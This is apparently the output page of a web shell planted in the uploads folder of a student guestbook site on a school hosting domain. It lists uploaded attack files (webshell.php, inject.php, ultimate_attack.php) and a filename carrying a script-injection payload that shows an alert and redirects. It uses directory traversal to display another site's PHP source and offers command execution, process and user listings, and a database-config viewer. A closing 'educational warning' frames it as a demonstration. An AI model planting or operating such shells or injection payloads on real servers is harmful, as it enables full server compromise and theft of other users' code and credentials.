🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../583521.klas4s23.mid-ica.nl/public_html/villaverkenner/villa_pdf.php

<?php
require_once 'config.php';
include_once 'class/class.php';

if (!isset($_GET['id']) || !is_numeric($_GET['id'])) {
    echo "<p>Geen geldige villa ID opgegeven.</p>";
    exit;
}

$villa_id = intval($_GET['id']); // Zorg ervoor dat het een integer is

// Haal de villa-gegevens op voor de gegeven ID
$sql = 'SELECT 
    v.id, 
    v.name AS villa_name, 
    v.price, 
    v.persons, 
    v.description AS villa_description,
    GROUP_CONCAT(DISTINCT l.name) AS location_names,
    GROUP_CONCAT(DISTINCT e.name) AS feature_names
  FROM villas v
  LEFT JOIN villa_has_locations vl ON v.id = vl.villa_id
  LEFT JOIN locations l ON vl.location_id = l.id
  LEFT JOIN villa_has_eigenschappen ve ON v.id = ve.villa_id
  LEFT JOIN eigenschappen e ON ve.eigenschappen_id = e.id
  WHERE v.id = :villa_id
  GROUP BY v.id';

$stmt = $pdo->prepare($sql);
$stmt->bindParam(':villa_id', $villa_id, PDO::PARAM_INT);
$stmt->execute();
$villa = $stmt->fetch(PDO::FETCH_ASSOC);

if (!$villa) {
    echo "<p>Villa niet gevonden.</p>";
    exit;
}

// Haal afbeeldingen op
$stmtImages = $pdo->prepare('SELECT image_path FROM villa_images WHERE villa_id = :villa_id');
$stmtImages->bindParam(':villa_id', $villa_id, PDO::PARAM_INT);
$stmtImages->execute();
$images = $stmtImages->fetchAll(PDO::FETCH_COLUMN);

// Genereer PDF
require('fpdf/fpdf.php');
$pdf = new FPDF();
$pdf->AddPage();

// Titel
$pdf->SetFont('Arial', 'B', 18);
$pdf->Cell(0, 10, utf8_decode($villa['villa_name']), 0, 1, 'C');

// Ruimte
$pdf->Ln(10);

// Informatie
$pdf->SetFont('Arial', '', 12);
$price = isset($villa['price']) && is_numeric($villa['price']) ? number_format($villa['price'], 0, ',', '.') : 'N/A';

$pdf->Cell(0, 10, 'Prijs: ' . $price, 0, 1);
$pdf->Cell(0, 10, 'Capaciteit: ' . $villa['persons'] . ' personen', 0, 1);
$pdf->MultiCell(0, 10, 'Beschrijving: ' . utf8_decode($villa['villa_description']));
$pdf->Cell(0, 10, 'Liggingen: ' . utf8_decode($villa['location_names']), 0, 1);
$pdf->Cell(0, 10, 'Eigenschappen: ' . utf8_decode($villa['feature_names']), 0, 1);

// Afbeeldingen
$pdf->Ln(10);
$imgX = 10;
$imgY = $pdf->GetY();
$imgWidth = 80; // Breedte van afbeelding
$imgMaxWidth = 190; // Maximale pagina breedte
$spaceBetweenImages = 10;

foreach ($images as $image) {
    $filePath = $image;

    if (file_exists($filePath)) {
        $pdf->Image($filePath, $imgX, $imgY, $imgWidth, 0);
        $imgX += $imgWidth + $spaceBetweenImages;

        if ($imgX + $imgWidth > $imgMaxWidth) {
            $imgX = 10;
            $imgY += $imgWidth + $spaceBetweenImages;
        }

        if ($imgY > 250) {
            $pdf->AddPage();
            $imgX = 10;
            $imgY = 10;
        }
    }
}
// echo '<pre>';
// var_dump($image);
// echo '</pre>';

// Output de PDF
$pdf->Output();
?>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!